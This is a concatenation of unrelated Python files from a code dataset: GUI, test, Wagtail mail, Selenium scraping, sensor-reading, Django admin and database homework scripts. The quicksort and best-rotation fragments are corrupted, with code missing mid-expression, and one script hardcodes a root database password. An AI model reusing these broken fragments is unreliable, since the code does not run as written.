self.selPanel.setEquiSash(event)\n\n def OnTabPopup(self,event):\n menu = TablePopup(self,self.selPanel.tabPanel.lbTab)\n self.PopupMenu(menu, event.GetPosition())\n menu.Destroy()\n\n def onTabSelectionChange(self,event=None):\n # TODO all this can go in TabPanel\n #print('Tab selection change')\n # Storing the previous selection \n #self.selPanel.printSelection()\n self.selPanel.saveSelection() # \n #self.selPanel.printSelection()\n ISel=self.selPanel.tabPanel.lbTab.GetSelections()\n if len(ISel)>0:\n if haveSameColumns(self.tabs,ISel):\n # Setting tab\n 
self.selPanel.setTabForCol(ISel[0],1) \n self.selPanel.colPanel2.empty()\n else:\n if self.selPanel._mode=='twoColumnsMode':\n if len(ISel)>2:\n Error(self,'In this mode, only two tables can be selected. To compare more than two tables, the tables need to have the same columns.')\n ISel=[ISel[0]]\n self.selPanel.tabPanel.lbTab.SetSelection(wx.NOT_FOUND)\n self.selPanel.tabPanel.lbTab.SetSelection(ISel[0])\n self.selPanel.setTabForCol(ISel[0],1) \n self.selPanel.colPanel2.empty()\n else: # two panels selected\n self.selPanel.setTabForCol(ISel[0],1) \n self.selPanel.setTabForCol(ISel[1],2) \n else:\n Error(self,'The two tables have different columns. Chose the \"two table mode\" to compare them.')\n # unselect all and select only the first one\n ISel=[ISel[0]]\n self.selPanel.tabPanel.lbTab.SetSelection(wx.NOT_FOUND)\n self.selPanel.tabPanel.lbTab.SetSelection(ISel[0])\n self.selPanel.setTabForCol(ISel[0],1) \n #print('>>>Updating tabSelected, from',self.selPanel.tabSelected,'to',self.selPanel.tabPanel.lbTab.GetSelections())\n self.selPanel.tabSelected=self.selPanel.tabPanel.lbTab.GetSelections()\n\n # Update of status bar\n self.statusbar.SetStatusText('',0)\n self.statusbar.SetStatusText(\", \".join([t.filename for (i,t) in enumerate(self.tabs) if i in ISel]),1)\n if len(ISel)==1:\n self.statusbar.SetStatusText('{}x{}'.format(self.tabs[ISel[0]].nCols,self.tabs[ISel[0]].nRows),2)\n else:\n self.statusbar.SetStatusText('',2)\n\n # Trigger the colSelection Event\n self.onColSelectionChange(event=None)\n\n def onColSelectionChange(self,event=None):\n if hasattr(self,'plotPanel'):\n if self.selPanel._mode=='twoColumnsMode':\n ISel=self.selPanel.tabPanel.lbTab.GetSelections()\n if haveSameColumns(self.tabs,ISel):\n pass # NOTE: this test is identical to onTabSelectionChange. Unification.\n elif len(ISel)==2:\n self.selPanel.colPanel1.forceOneSelection()\n self.selPanel.colPanel2.forceOneSelection()\n self.plotPanel.redraw()\n #print(self.tabs)\n # --- Stats trigger\n #self.showStats()\n\n def redraw(self):\n if hasattr(self,'plotPanel'):\n self.plotPanel.redraw()\n# def showStats(self):\n# self.infoPanel.showStats(self.plotPanel.plotData,self.plotPanel.pltTypePanel.plotType())\n\n def onExit(self, event):\n self.Close()\n\n def cleanGUI(self, event=None):\n if hasattr(self,'plotPanel'):\n del self.plotPanel\n if hasattr(self,'selPanel'):\n del self.selPanel\n if hasattr(self,'infoPanel'):\n del self.infoPanel\n #self.deletePages()\n try:\n self.MainPanel.GetSizer().Clear(delete_windows=True) # Delete Windows\n except:\n self.MainPanel.GetSizer().Clear()\n self.FrameSizer.Layout()\n gc.collect()\n\n def onSave(self, event=None):\n # using the navigation toolbar save functionality\n self.plotPanel.navTB.save_figure()\n\n def onAbout(self, event=None):\n Info(self,PROG_NAME+' '+PROG_VERSION+'\\n\\nWritten by E. Branlard. 
\\n\\nVisit http://github.com/ebranlard/pyDatView for documentation.')\n\n def onReload(self, event=None):\n filenames = self.filenames\n if len(filenames)>0:\n iFormat=self.comboFormats.GetSelection()\n if iFormat==0: # auto-format\n Format = None\n else:\n Format = FILE_FORMATS[iFormat-1]\n self.load_files(filenames,fileformat=Format,bReload=True,bAdd=False)\n else:\n Error(self,'Open one or more file first.')\n\n def onDEBUG(self, event=None):\n #self.clean_memory()\n self.plotPanel.ctrlPanel.Refresh()\n self.plotPanel.cb_sizer.ForceRefresh()\n\n def onExport(self, event=None):\n ISel=[]\n try:\n ISel = self.selPanel.tabPanel.lbTab.GetSelections()\n except:\n pass\n if len(ISel)>0:\n self.exportTab(ISel[0])\n else:\n Error(self,'Open a file and select a table first.')\n\n def onLoad(self, event=None):\n self.selectFile(bAdd=False)\n\n def onAdd(self, event=None):\n self.selectFile(bAdd=len(self.tabs)>0)\n\n def selectFile(self,bAdd=False):\n # --- File Format extension\n iFormat=self.comboFormats.GetSelection()\n sFormat=self.comboFormats.GetStringSelection()\n if iFormat==0: # auto-format\n Format = None\n #wildcard = 'all (*.*)|*.*'\n wildcard='|'.join([n+'|*'+';*'.join(e) for n,e in zip(FILE_FORMATS_NAMEXT,FILE_FORMATS_EXTENSIONS)])\n #wildcard = sFormat + extensions+'|all (*.*)|*.*'\n else:\n Format = FILE_FORMATS[iFormat-1]\n extensions = '|*'+';*'.join(FILE_FORMATS[iFormat-1].extensions)\n wildcard = sFormat + extensions+'|all (*.*)|*.*'\n\n with wx.FileDialog(self, \"Open file\", wildcard=wildcard,\n style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST | wx.FD_MULTIPLE) as dlg:\n #other options: wx.CHANGE_DIR\n #dlg.SetSize((100,100))\n #dlg.Center()\n if dlg.ShowModal() == wx.ID_CANCEL:\n return # the user changed their mind\n self.load_files(dlg.GetPaths(),fileformat=Format,bAdd=bAdd)\n\n\n def onModeChange(self, event=None):\n mode = SEL_MODES_ID[self.comboMode.GetSelection()]\n if hasattr(self,'selPanel'):\n self.selPanel.updateLayout(mode)\n self.mainFrameUpdateLayout()\n\n def mainFrameUpdateLayout(self, event=None):\n if hasattr(self,'selPanel'):\n nWind=self.selPanel.splitter.nWindows\n self.resizeSideColumn(SIDE_COL[nWind])\n\n\n # --- Side column\n def resizeSideColumn(self,width):\n # To force the replot we do an epic unsplit/split...\n #self.vSplitter.Unsplit()\n #self.vSplitter.SplitVertically(self.selPanel, self.tSplitter)\n self.vSplitter.SetMinimumPaneSize(width)\n self.vSplitter.SetSashPosition(width)\n #self.selPanel.splitter.setEquiSash()\n\n # --- NOTEBOOK \n #def deletePages(self):\n # for index in reversed(range(self.nb.GetPageCount())):\n # self.nb.DeletePage(index)\n # self.nb.SendSizeEvent()\n # gc.collect()\n #def on_tab_change(self, event=None):\n # page_to_select = event.GetSelection()\n # wx.CallAfter(self.fix_focus, page_to_select)\n # event.Skip(True)\n #def fix_focus(self, page_to_select):\n # page = self.nb.GetPage(page_to_select)\n # page.SetFocus()\n\n#----------------------------------------------------------------------\ndef MyExceptionHook(etype, value, trace):\n \"\"\"\n Handler for all unhandled exceptions.\n :param `etype`: the exception type (`SyntaxError`, `ZeroDivisionError`, etc...);\n :type `etype`: `Exception`\n :param string `value`: the exception error message;\n :param string `trace`: the traceback header, if any (otherwise, it prints the\n standard Python header: ``Traceback (most recent call last)``.\n \"\"\"\n # Printing exception\n traceback.print_exception(etype, value, trace)\n # Then showing to user the last error\n frame = 
wx.GetApp().GetTopWindow()\n tmp = traceback.format_exception(etype, value, trace)\n exception = 'The following exception occured:\\n\\n'+ tmp[-1] + '\\n'+tmp[-2].strip()\n Error(frame,exception)\n\n# --------------------------------------------------------------------------------}\n# --- Tests \n# --------------------------------------------------------------------------------{\ndef test(filenames=None):\n if filenames is not None:\n app = wx.App(False)\n frame = MainFrame()\n frame.load_files(filenames,fileformat=None)\n return\n \n# --------------------------------------------------------------------------------}\n# --- Mains \n# --------------------------------------------------------------------------------{\ndef showApp(dataframe=None,filenames=[]):\n \"\"\"\n The main function to start the data frame GUI.\n \"\"\"\n try:\n app = wx.App(False)\n except:\n print(\"MacOS Error:\")\n print(\" This program needs access to the screen. Please run with a\")\n print(\" Framework build of python, and only when you are logged in\")\n print(\" on the main display of your Mac.\")\n print(\"\")\n print(\"pyDatView help:\")\n print(\" You see the error above because you are using a Mac and \")\n print(\" the python executable you are using does not have access to\")\n print(\" your screen. This is a Mac issue, not a pyDatView issue.\")\n print(\" Instead of calling 'python pyDatView.py', you need to find\")\n print(\" another python and do '/path/python pyDatView.py'\")\n print(\" You can try './pythonmac pyDatView.py', a script provided\")\n print(\" in this repository to detect the path (in some cases)\")\n print(\" \")\n print(\" You can find additional help in the file 'README.md'.\")\n print(\" \")\n print(\" For quick reference, here are some typical cases:\")\n print(\" - Your python was installed with 'brew', then likely use \")\n print(\" /usr/lib/Cellar/python/XXXXX/Frameworks/python.framework/Versions/XXXX/bin/pythonXXX\");\n print(\" - Your python is an anaconda python, use something like:\");\n print(\" /anaconda3/bin/python.app (NOTE: the '.app'!\")\n print(\" - You are using a python 2 version, you can use the system one:\")\n print(\" /Library/Frameworks/Python.framework/Versions/XXX/bin/pythonXXX\")\n print(\" /System/Library/Frameworks/Python.framework/Versions/XXX/bin/pythonXXX\")\n return\n\n frame = MainFrame()\n\n if (dataframe is not None) and (len(dataframe)>0):\n #import time\n #tstart = time.time()\n frame.load_df(dataframe)\n #tend = time.time()\n #print('PydatView time: ',tend-tstart)\n elif len(filenames)>0:\n frame.load_files(filenames,fileformat=None)\n app.MainLoop()\n\ndef cmdline():\n if len(sys.argv)>1:\n pydatview(filename=sys.argv[1])\n else:\n pydatview()\n","sub_path":"pydatview/pydatview.py","file_name":"pydatview.py","file_ext":"py","file_size_in_byte":30066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"409938114","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom nose.tools import *\n\nfrom six.moves import map, range, zip\n\nfrom dit.npdist import Distribution\nfrom dit.exceptions import *\n\nimport numpy as np\n\ndef test_init1():\n # Invalid initializations.\n assert_raises(InvalidDistribution, Distribution, [])\n assert_raises(InvalidDistribution, Distribution, [], [])\n Distribution([], [], sample_space=[(0,1)], validate=False)\n\ndef test_atoms():\n pmf = [.125, .125, .125, .125, .25, 0, .25]\n outcomes = ['000', '011', '101', '110', '222', '321', '333']\n d = 
Distribution(outcomes, pmf)\n\n atoms = outcomes\n assert_equal( list(d.atoms()), atoms)\n\n patoms = ['000', '011', '101', '110', '222', '333']\n assert_equal( list(d.atoms(patoms=True)), patoms)\n\n d = Distribution(outcomes, pmf, sample_space=outcomes + ['444'])\n atoms = outcomes + ['444']\n assert_equal( list(d.atoms()), atoms)\n\ndef test_zipped():\n pmf = [.125, .125, .125, .125, .25, 0, .25]\n outcomes = ['000', '011', '101', '110', '222', '321', '333']\n d = Distribution(outcomes, pmf)\n\n outcomes_, pmf_ = list(zip(*d.zipped()))\n d2 = Distribution(outcomes_, pmf_)\n assert_true(d.is_approx_equal(d2))\n\n outcomes_, pmf_ = list(zip(*d.zipped(mode='atoms')))\n d3 = Distribution(outcomes_, pmf_)\n assert_true(d.is_approx_equal(d3))\n\n outcomes_, pmf_ = list(zip(*d.zipped(mode='patoms')))\n d4 = Distribution(outcomes_, pmf_)\n d.make_sparse()\n np.testing.assert_allclose(d.pmf, d4.pmf)\n\ndef test_init2():\n # Cannot initialize with an iterator.\n # Must pass in a sequence for outcomes.\n outcomes = map(int, ['0','1','2','3','4'])\n pmf = [1/5] * 5\n assert_raises(TypeError, Distribution, outcomes, pmf)\n","sub_path":"dit/tests/test_npdist.py","file_name":"test_npdist.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"310231615","text":"import logging\n\nfrom django.conf import settings\nfrom django.core.mail import get_connection\nfrom django.core.mail.message import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nfrom django.utils.translation import override\n\nfrom wagtail.admin.auth import users_with_page_permission\nfrom wagtail.core.models import PageRevision\nfrom wagtail.users.models import UserProfile\n\n\nlogger = logging.getLogger('wagtail.admin')\n\n\ndef send_mail(subject, message, recipient_list, from_email=None, **kwargs):\n \"\"\"\n Wrapper around Django's EmailMultiAlternatives as done in send_mail().\n Custom from_email handling and special Auto-Submitted header.\n \"\"\"\n if not from_email:\n if hasattr(settings, 'WAGTAILADMIN_NOTIFICATION_FROM_EMAIL'):\n from_email = settings.WAGTAILADMIN_NOTIFICATION_FROM_EMAIL\n elif hasattr(settings, 'DEFAULT_FROM_EMAIL'):\n from_email = settings.DEFAULT_FROM_EMAIL\n else:\n from_email = 'webmaster@localhost'\n\n connection = kwargs.get('connection', False) or get_connection(\n username=kwargs.get('auth_user', None),\n password=kwargs.get('auth_password', None),\n fail_silently=kwargs.get('fail_silently', None),\n )\n multi_alt_kwargs = {\n 'connection': connection,\n 'headers': {\n 'Auto-Submitted': 'auto-generated',\n }\n }\n mail = EmailMultiAlternatives(subject, message, from_email, recipient_list, **multi_alt_kwargs)\n html_message = kwargs.get('html_message', None)\n if html_message:\n mail.attach_alternative(html_message, 'text/html')\n\n return mail.send()\n\n\ndef send_notification(page_revision_id, notification, excluded_user_id):\n # Get revision\n revision = PageRevision.objects.get(id=page_revision_id)\n\n # Get list of recipients\n if notification == 'submitted':\n # Get list of publishers\n include_superusers = getattr(settings, 'WAGTAILADMIN_NOTIFICATION_INCLUDE_SUPERUSERS', True)\n recipients = users_with_page_permission(revision.page, 'publish', include_superusers)\n elif notification in ['rejected', 'approved']:\n # Get submitter\n recipients = [revision.user]\n else:\n return False\n\n # Get list of email addresses\n email_recipients = [\n recipient for recipient in recipients\n 
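# keep recipients that have an email address, are not the excluded user, and have this notification type enabled on their profile\n        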
if recipient.email and recipient.pk != excluded_user_id and getattr(\n UserProfile.get_for_user(recipient),\n notification + '_notifications'\n )\n ]\n\n # Return if there are no email addresses\n if not email_recipients:\n return True\n\n # Get template\n template_subject = 'wagtailadmin/notifications/' + notification + '_subject.txt'\n template_text = 'wagtailadmin/notifications/' + notification + '.txt'\n template_html = 'wagtailadmin/notifications/' + notification + '.html'\n\n # Common context to template\n context = {\n \"revision\": revision,\n \"settings\": settings,\n }\n\n # Send emails\n sent_count = 0\n for recipient in email_recipients:\n try:\n # update context with this recipient\n context[\"user\"] = recipient\n\n # Translate text to the recipient language settings\n with override(recipient.wagtail_userprofile.get_preferred_language()):\n # Get email subject and content\n email_subject = render_to_string(template_subject, context).strip()\n email_content = render_to_string(template_text, context).strip()\n\n kwargs = {}\n if getattr(settings, 'WAGTAILADMIN_NOTIFICATION_USE_HTML', False):\n kwargs['html_message'] = render_to_string(template_html, context)\n\n # Send email\n send_mail(email_subject, email_content, [recipient.email], **kwargs)\n sent_count += 1\n except Exception:\n logger.exception(\n \"Failed to send notification email '%s' to %s\",\n email_subject, recipient.email\n )\n\n return sent_count == len(email_recipients)\n","sub_path":"wagtail/admin/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"418661525","text":"import os\nimport numpy as np\nimport sys\nimport timeit\nfrom service import GetFeature as GetFeature\nfrom service import TrainingMethod as RFTrainer\nfrom service import Utils as Utils\n\nfeature = sys.argv[1]\nml = sys.argv[2]\nmethod = sys.argv[3]\nfold = int(sys.argv[4])\ntrees = int(sys.argv[5])\n\ndef main():\n # GetFeature.getFeature('./data/trian_po_set3298_for_ampep_sever.fasta',\n # './data/trian_po_set3298_for_ampep_sever.tsv', feature)\n # GetFeature.getFeature('./data/trian_ne_set9894_for_ampep_sever.fasta',\n # './data/trian_ne_set9894_for_ampep_sever.tsv', feature)\n utils = Utils.Utils('Train')\n posArray, posY = utils.readFeature(\n \"data/trian_po_set3298_for_ampep_sever.tsv\", 1)\n negArray, negY = utils.readFeature(\n \"data/trian_ne_set9894_for_ampep_sever.tsv\", 0)\n X = np.concatenate((posArray, negArray))\n y = np.concatenate((posY, negY))\n print(len(X), len(y))\n\n trainer = RFTrainer.Trainer(X, y)\n trainer.training(fold, trees, method)\n\nstart = timeit.default_timer()\nmain()\nstop = timeit.default_timer()\nprint('Time: ', stop - start)","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"317914241","text":"from logging import exception\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport webdriver_manager\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\n\r\nclass GoogleKeywordScreenshoter():\r\n def __init__(self, keyword, screenshots_dir):\r\n self.browser = webdriver.Chrome(ChromeDriverManager().install())\r\n self.keyword = 
keyword\r\n        self.screenshots_dir = screenshots_dir\r\n\r\n    def start(self):\r\n        self.browser.get(\"https://google.com\")\r\n        search_bar = self.browser.find_element_by_class_name(\"gLFyf\")\r\n        search_bar.send_keys(self.keyword)\r\n        search_bar.send_keys(Keys.ENTER)\r\n        shitty_element = WebDriverWait(self.browser, 10).until(\r\n            EC.presence_of_element_located((By.CLASS_NAME,\"g-blk\")))\r\n        self.browser.execute_script(\r\n            \"\"\"\r\n            const shitty = arguments[0];\r\n            shitty.parentElement.removeChild(shitty)\r\n            \"\"\",\r\n            shitty_element,\r\n        )\r\n        search_results = self.browser.find_elements_by_class_name(\"g\")\r\n        for index, results in enumerate(search_results):\r\n            results.screenshot(\r\n                f\"{self.screenshots_dir}/{self.keyword}x{index}.png\")\r\n    def finish(self):\r\n        self.browser.quit()\r\n\r\ndomain_competitor = GoogleKeywordScreenshoter(\"buy domain\",\"screenshots\")\r\ndomain_competitor.start()\r\ndomain_competitor.finish()\r\n\r\n\r\n\r\n\r\n","sub_path":"selenium/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"461824739","text":"#python3\n\n#len_seq_in = int(input())\n\n#print(\"len_seq\",len_seq_in)\n\n#seq_in = list(map(int,(input()).split()))\n\n#print(\"seq_in\",seq_in)\n\n\ndef quick_sort(seq):\n\n#\tprint (\"seq being sorted\", seq)\n\n\tequal_pivot = []\n#\tprint(\"equal_pivot\",equal_pivot)\n\n\tless_pivot = []\n#\tprint(\"less_pivot\",less_pivot)\n\n\tgreater_pivot = []\n#\tprint(\"greater_pivot\",greater_pivot)\n\n\tlen_seq = len(seq)\n\n\tif len_seq>1:\n\n\t\tpivot = seq[0]\n#\t\tprint(\"pivot\", pivot)\n\n\t\tfor i in range(0,len_seq):\n#\t\t\tprint (\"seq[i]\",seq[i])\n\n\t\t\tif seq[i] j:\r\n                total+=1\r\n            print(total)\r\n        if total > best[1]:\r\n            best= [i,total]\r\n    return best[0]\r\n\r\nif __name__ == \"__main__\":\r\n    a = [2,3,1,4,0] \r\n    print(bestRotation(a)) ","sub_path":"python/bestrotation.py","file_name":"bestrotation.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"64459782","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 15 10:25:22 2017\n\n@author: AB053658\n\"\"\"\n\nimport urllib.request\nimport re\nimport os\nimport json\nimport logging\n\ndef _getArtfId(url):\n    \"\"\"\n    Input: the configcenter URL and the value of the label tag\n    Output: dict Artf\n    Purpose: collect the values under the ArtifactId tab and return them grouped by the second-level tag (e.g. ui). There are 9 classes such as db, ui, app and micro; entries without this tab get default values.\n    \"\"\"\n    comp_list = ['jdk','activiti','opts','zookeeper','solr','activemq','cas','tomcat','nginx']\n    Artf = {}\n    db = {}\n    ui = {}\n    micro ={}\n    app = {}\n    activiti = {'explorer':'activiti-explorer','rest':'activiti-webapp-rest'}\n    mule_dm = {}\n    mule_db = {}\n    mule_app = {}\n    envdata = {\n        'caretaker':'vm-caretaker',\n        'zookeeper':'zookeeper',\n        'solr':'solr',\n        'redis':'redis'\n    }\n    comp = {\n        'jdk':'jdk',\n        'activemq':'apache-activemq',\n        'mule':'mule',\n        'tomcat':'apache-tomcat',\n        'nginx':'nginx',\n        'cas': 'cas',\n        'opts': 'com.ebao.opts.shell'\n    }\n    urlOpen = urllib.request.urlopen(url)\n    urlJson = urlOpen.read().decode('utf-8')\n    urlData = json.loads(urlJson)\n    for appkey,values in urlData.items():\n#        print(appkey)\n        appFlag = appkey.split('/')[2]\n        if appFlag not in comp_list:\n            if appFlag.lower() == 'ui':\n                for key,value in values.items():\n                    ui[key] = value\n            elif appFlag.lower() == 'microservice':\n                for key,value in values.items():\n                    micro[value] = value\n            elif appFlag.lower() == 'app':\n                for key,value in 
values.items():\n                    app[key] = value\n                    db[key] = value\n            elif appFlag.lower() == 'mule':\n                for key,value in values.items():\n                    if key == 'mule_dm':\n                        mule_dm['mule_dm'] = value\n                    elif key == 'mule_app':\n                        mule_app['mule_app'] = value\n                    elif key == 'db':\n                        mule_db['mule'] = value\n    Artf['ui'] = ui\n    Artf['db'] = dict(db, **mule_db)\n    Artf['app'] = app\n    Artf['micro'] = micro\n    Artf['comp'] = comp\n    Artf['mule_dm'] = mule_dm\n    Artf['activiti'] = activiti\n    Artf['nginx'] = {'conf':'nginx-conf'}\n    Artf['mule_app'] = mule_app\n    Artf['envdata'] = envdata\n#    print (Artf)\n    return Artf\n\ndef _getConfig(appUrl):\n    \"\"\"\n    Input: the configcenter URL\n    Output: dict\n    Purpose: write the JSON data returned by the URL into a dict\n    \"\"\"\n\n    appOpen = urllib.request.urlopen(appUrl)\n    appJson = appOpen.read().decode('utf-8')\n    appData = json.loads(appJson)\n    allData = appData['data']\n    print (type(allData))\n    newData = {}\n    for key, value in allData.items():\n        newData[key] = value\n    print (newData)\n    return newData\n\ndef _init_count(Artf):\n    \"\"\"\n    Input: the Artf dict\n    Output: the count dict\n    Purpose: combine each second-level key of Artf with its type to form a new key, initialising every value to 0\n    \"\"\"\n\n    count = {}\n    for type,dic in Artf.items():\n        typeFlag = type\n        print(\">>>>>>>>>>>>>>\"+type+\"<<<<<<<<<<<<<<<<\")\n        print(typeFlag)\n        for key in dic.keys():\n            print(key)\n            resultFlag = key + '_' + typeFlag\n            count[resultFlag] = 0\n    return count\n\n\ndef _serverList(configCenter,profile,label):\n    \"\"\"\n    Input: configCenter, profile, label\n    Output: serverCon dict\n    Purpose: return the list of services running on each server.\n    \"\"\"\n    serverDict = _getData(configCenter,profile,'server',label)\n    serverCon={}\n    serverList=[]\n    allserverList=[]\n    for key,value in serverDict.items():\n        if ',' in value:\n            tempList = value.split(',')\n            allserverList += tempList\n        else:\n            allserverList.append(value)\n    for item in allserverList:\n        if item not in serverList:\n            serverList.append(item)\n    for item in serverList:\n        serverCon[item]=[]\n    for key,value in serverDict.items():\n        if ',' in value:\n            tempList = value.split(',')\n            for item in tempList:\n                serverCon[item].append(key)\n        else:\n            serverCon[value].append(key)\n    return serverCon\n\nif __name__ == '__main__':\n    app_root='/home/tomcat'\n    configCenter= 'http://10.5.74.116:7101/configs'\n    profile='anbang_prod'\n    label='main'\n    application='server'\n    url = configCenter + '?profile=' + profile + '&application='+ application + '&label='+ label\n    url1 = configCenter+'/export' + '?profile=' +'ArtifactId' + '&application='+'*'+ '&label='+ label\n    print(url1)\n\n\n\n#    print(_getConfig(url))\n#    Artf=_getArtfId(url1)\n#    print(Artf)\n#    print(_init_count(Artf))\n    print()","sub_path":"salt/salttest.py","file_name":"salttest.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"28479722","text":"import os\nimport re\nimport glob\nfrom datetime import datetime as dt\n\nfrom raspi_logger.util import get_serial_number\nfrom raspi_logger import keywords\n\n\ndef _get_sensors(path):\n    return glob.glob(path + '28-*')\n\n\ndef _get_temperature(sensor_path):\n    with open(sensor_path + '/w1_slave', 'r') as f:\n        c = f.read().split('\\n')\n\n    m = re.match(r\"([0-9a-f]{2} ){9}t=([+-]?[0-9]+)\", c[1])\n    if m:\n        value = float(m.group(2)) / 1000.\n    else:\n        value = 'NaN'\n\n    return value, '\\n'.join(c)\n\n\ndef read_sensor(path='/sys/bus/w1/devices/', omit_sensor=False, omit_keyword=False, sensor_conf={}):\n    data = []\n\n    # get the Raspi serial number\n    versions = get_serial_number()\n\n    # get sensor config\n    #sensor_conf = conf.get('sensorBackends', {}).get('ds18b20', 
{})\n\n for p in _get_sensors(path):\n temperature, hextemp = _get_temperature(p)\n\n d = dict(\n value=temperature,\n tstamp=dt.now().isoformat(),\n identifier=os.path.basename(p),\n rawData=hextemp,\n sensorName=sensor_conf.get('alias', 'DS18B20')\n )\n\n # extend\n if not omit_keyword:\n # get the sensor config\n if p in sensor_conf:\n extra = sensor_conf[p]\n elif '_all_' in sensor_conf:\n extra = sensor_conf['_all_']\n else:\n extra = {}\n in_soil = extra.get(\"in_soil\", False)\n \n # add the correct variable and sensor information\n _uuid = keywords.SOIL_TEMPERATURE if in_soil else keywords.AIR_TEMPERATURE\n variable = dict(\n variableName='SOIL TEMPERATURE' if in_soil else 'AIR TEMPERATURE',\n gcmdURL=keywords.CONCEPT_URL.format(uuid=_uuid, fmt='xml'),\n gcmdUUID=_uuid\n )\n\n # update\n d.update(variable)\n\n if not omit_sensor:\n d.update(versions) \n\n data.append(d)\n \n # return\n return data\n\n\nif __name__ == '__main__':\n import fire\n fire.Fire(read_sensor)\n","sub_path":"raspi_logger/sensors/ds18b20.py","file_name":"ds18b20.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"632218444","text":"from setuptools import setup, find_packages\nfrom setuptools.command.install import install as _install\n\nclass Install(_install):\n def run(self):\n _install.run(self)\n import nltk\n try:\n nltk.corpus.stopwords.words(\"english\")\n except:\n nltk.download('stopwords')\n \nconfig = {\n 'name': 'landmark_ml',\n 'description': 'Machine learning library for the landmark set of tools',\n 'author': 'InferLink',\n 'url': 'https://github.com/inferlink/landmark-ml',\n 'download_url': 'https://github.com/inferlink/landmark-ml',\n 'author_email': 'developers@inferlink.com ',\n 'version': '0.1.1',\n 'license': 'GNU AGPL',\n 'packages': find_packages(),\n 'classifiers': [],\n 'install_requires' : ['nltk'],\n 'setup_requires' : ['nltk'],\n 'cmdclass':{'install': Install}\n}\n\nsetup(**config)","sub_path":"pypi_install_script/landmark_ml-0.1.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"299090696","text":"from django.contrib import admin\n\nfrom .models import SnmpDevice, SnmpDeviceMessage, PingHistory\n\n# Register your models here.\n\nclass SnmpDeviceAdmin(admin.ModelAdmin):\n fields = [\n 'name', 'hostname', 'status', 'ping_mode', 'ping_port',\n 'snmp_template', 'snmp_port', 'snmp_community', 'snmp_system_contact',\n 'snmp_system_description', 'snmp_system_name', 'snmp_system_location',\n 'snmp_system_uptime','ping_last_seen', 'ping_last_tried',\n 'snmp_last_tried', 'snmp_last_poll', 'snmp_logged_on_users'\n ]\n\n readonly_fields = (\n 'ping_last_seen', 'ping_last_tried', 'snmp_last_tried',\n 'snmp_last_poll'\n )\n\n list_display = [\n 'name', 'hostname', 'snmp_logged_on_users'\n ]\n\n\nclass SnmpDeviceMessageAdmin(admin.ModelAdmin):\n fields = (\n 'snmp_device', 'status', 'message_choice', 'resolved', 'resolved_by'\n )\n\n\nclass PingHistoryAdmin(admin.ModelAdmin):\n fields = [\n 'snmp_device', 'online', 'timestamp'\n ]\n\n readonly_fields = [\n 'timestamp',\n ]\n\n list_display = [\n 'snmp_device', 'online', 'timestamp'\n ]\n\n\nadmin.site.register(SnmpDevice, SnmpDeviceAdmin)\nadmin.site.register(PingHistory, PingHistoryAdmin)\nadmin.site.register(SnmpDeviceMessage, 
SnmpDeviceMessageAdmin)\n","sub_path":"sentinel/device/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"193309907","text":"import pymysql\n\n\ndef login():\n    db = pymysql.connect(host='192.168.72.130',\n                         port=3306,\n                         user='root',\n                         password='123456',\n                         database='zuoye4')\n\n    # get a cursor object that can execute SQL statements\n    cursor = db.cursor()\n    # execute SQL statements\n    # create a database\n    cursor.execute(\"create database test_zuoye character set utf8;\")\n    # switch to the database\n    cursor.execute(\"use test_zuoye;\")\n    # create a table\n    cursor.execute(\"CREATE TABLE zuoye4(\"\n                   \"id INT auto_increment PRIMARY KEY,\"\n                   \"name CHAR(10) NOT NULL UNIQUE,\"\n                   \"age TINYINT NOT NULL); \")\n\n    # insert several rows\n    cursor.execute(\"insert into zuoye4(id,name,age) values(1,'huangxin',24), (2,'xiaoming',25), (3,'xiaohong',26);\")\n    # update one row\n    cursor.execute(\"update zuoye4 set age = '26' where id='2';\")\n    # delete one row\n    cursor.execute(\"delete from zuoye4 where name = 'xiaohong';\")\n    # commit the changes\n    db.commit()\n    # close the cursor object\n    cursor.close()\n    # close the database connection\n    db.close()\n    print(\"operation complete\")\n\n\ndef main():\n    login()\n\n\nmain()\n\n\n","sub_path":"test_automatic/黄鑫作业/黄鑫作业4.py","file_name":"黄鑫作业4.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
